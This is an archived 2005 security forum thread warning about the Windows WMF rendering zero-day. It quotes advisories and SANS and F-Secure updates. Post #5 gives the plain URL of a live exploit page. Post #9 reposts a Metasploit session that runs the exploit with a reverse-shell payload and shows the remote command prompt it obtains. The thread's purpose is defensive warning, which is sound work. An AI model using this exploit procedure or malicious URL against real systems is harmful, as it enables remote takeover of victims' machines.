** HEADS UP ** IE vulnerability. EXTREMELY CRITICAL.
Page 1 of 17 12311 ... LastLast
Results 1 to 10 of 163

Thread: ** HEADS UP ** IE vulnerability. EXTREMELY CRITICAL.

  1. #1
    StOrM™
    Join Date
    Aug 2004
    Posts
    1,003

    ** HEADS UP ** IE vulnerability. EXTREMELY CRITICAL.

    Greeting's

    Here we go again .

    http://www.frsirt.com/english/advisories/2005/3086

    A vulnerability has been identified in Microsoft Windows, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to an error in the rendering of Windows Metafile (WMF) image formats, which could be exploited by attackers to remotely take complete control of an affected system by convincing a user to open a malicious WMF file using a vulnerable application that renders WMF images (e.g. Windows Picture and Fax Viewer), or visit a specially crafted Web page that is designed to automatically exploit this vulnerability through Internet Explorer.


    This unpatched vulnerability is currently being exploited in the wild. Other browsers are also vulnerable if a user chooses to manually download and view a malicious WMF file.


    Microsoft Windows XP Service Pack 1
    Microsoft Windows XP Service Pack 2
    Microsoft Windows XP Professional x64 Edition
    Microsoft Windows Server 2003
    Microsoft Windows Server 2003 Service Pack 1
    Microsoft Windows Server 2003 for Itanium-based Systems
    Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
    Microsoft Windows Server 2003 x64 Edition
    http://secunia.com/advisories/18255/


    Exploit code is publicly available. This is being exploited in the wild
    Parth Maniar,
    CISSP, CISM, CISA, SSCP

    *Thank you GOD*

    Greater the Difficulty, SWEETER the Victory.

    Believe in yourself.

  2. #2

  3. #3
    Senior Member Deeboe's Avatar
    Join Date
    Nov 2005
    Posts
    185
    I posted this same vulnerability about 4 hours ago in another thread called Windows WMF 0-day exploit in the wild. I will just move that post into this thread as it seems to have moved down the list.

    **********************************
    Earlier post

    Hello,

    I was on the SANS ISC this morning and read a diary entry for a Windows WMF 0-day exploit in the wild. Go here for the information: http://isc.sans.org/ But to paraphrase the diary:

    Just when we thought that this will be another slow day, a link to a working unpatched exploit in, what looks like Windows Graphics Rendering Engine, has been posted to Bugtraq.
    ...
    The HTML file runs another WMF (Windows Meta File) which executes a trojan dropper on a fully patched Windows XP SP2 machine. The dropper will then download Winhound, a fake anti-spyware/virus program which asks user to purchase a registered version of software in order to remove the reported threats.
    ...
    According to F-Secure's blog "Firefox users can get infected if they decide to run or download the image file."
    Also, I am on the Metaploit mailing list, and it appears that there is already an plugin available for the exploit. http://metasploit.com/projects/Frame...p_pfv_metafile

    Should be a fun one!
    -Deeboe
    If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.
    - Sun Tzu, The Art of War

    http://tazforum.**********.com/

  4. #4
    Senior Member genXer's Avatar
    Join Date
    Jun 2005
    Posts
    252

    Internet Storm Center Goes YELLOW... for a bit on this one.

    Link: http://isc.sans.org/

    Updated Story on ISC going Yellow:
    Handler's Diary December 28th 2005

    previous -

    * Update on Windows WMF 0-day (NEW)
    Published: 2005-12-28,
    Last Updated: 2005-12-28 19:07:59 UTC by Daniel Wesemann (Version: 1)

    Update 19:07 UTC: We are moving to Infocon [gloworange]Yellow[/gloworange] for a bit. There has been some debate among the handlers about this step, but considering that a lot of people are on holidays and might otherwise miss the WMF 0-day problem, we have decided to raise the alert level.

    The orignal exploit site (unionseek.com) is no longer up. But the exploit is being served from various sites all over by now, see the F-Secure Blog on http://www.f-secure.com/weblog/ for an update on the versions of the exploit found in the wild.
    Apologies if someone else already beat me to the punch on the update.


    UPDATE... yet again - heh - just a quick blurb as of [gloworange]Update 19:07 UTC[/gloworange]:

    Working exploit code is widely available, and has also been published by FRSIRT and the Metasploit Framework.
    This obviously coincides with the posts following what I threw up me'ah - the next 12-24 should be fun. Think I'll start drinking now.
    \"We\'re the middle children of history.... no purpose or place. We have no Great War, no Great Depression. Our great war is a spiritual war. Our great depression is our lives. We\'ve all been raised by television to believe that one day we\'ll all be millionaires and movie gods and rock stars -- but we won\'t. And we\'re learning slowly that fact. And we\'re very, very pissed off.\" - Tyler (Brad Pitt) Fight Club.

  5. #5
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Warning the following URL successfully exploited a fully patched windows xp system with a freshly updated norton anti virus.

    unionseek.com/d/t1/wmf_exp.htm

    The url runs a .wmf and executes the virus, f-secure will pick up the virus norton will not.

  6. #6
    Senior Member Deeboe's Avatar
    Join Date
    Nov 2005
    Posts
    185
    Earlier post from ISC earlier today:

    The posted URL is [ uni on seek. com/ d/t 1/ wmf_exp. htm ]
    (DON'T GO HERE UNLESS YOU KNOW WHAT YOU'RE DOING. Added spaces to avoid accidental clicking. See Firefox note below!!)
    Quote from ISC later in the day:

    The orignal exploit site (unionseek.com) is no longer up. But the exploit is being served from various sites all over by now, see the F-Secure Blog on http://www.f-secure.com/weblog/ for an update on the versions of the exploit found in the wild.
    Gore, I am not going to browse to the site on this computer, but are you saying that the unionseek.com site is back up?

    -Deeboe
    If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.
    - Sun Tzu, The Art of War

    http://tazforum.**********.com/

  7. #7
    BIOS Bomber
    Join Date
    Jul 2003
    Location
    Michigan
    Posts
    357
    well for windows users this is normal everyday life. im glad i support this .......*cough* for some reason i cant say that with a straight face.
    "When in doubt, use Brute Force."

    Never argue with an idiot. They'll drag you down to their level, then beat you with experience.

  8. #8
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Don't know, I'm not dumb enough to go to it.

  9. #9
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Metasploit Framework in case anyone wants to
    test it without installing a thousand spyware apps...

    Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

    --http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
    --http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

    Tested on Win XP SP1 and SP2.

    -HD

    + -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

    msf > use ie_xp_pfv_metafile
    msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
    PAYLOAD -> win32_reverse
    msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
    LHOST -> 192.168.0.2
    msf ie_xp_pfv_metafile(win32_reverse) > exploit
    [*] Starting Reverse Handler.[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\XXXX\Desktop>

  10. #10
    This should act as a fix, since it should avoid any rendering of the file. It wont fix the vulnerability, but it will prevent auto-ownage via the browser or IM until a patch is ready.

    Control panel, folder options... then view the attachment.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •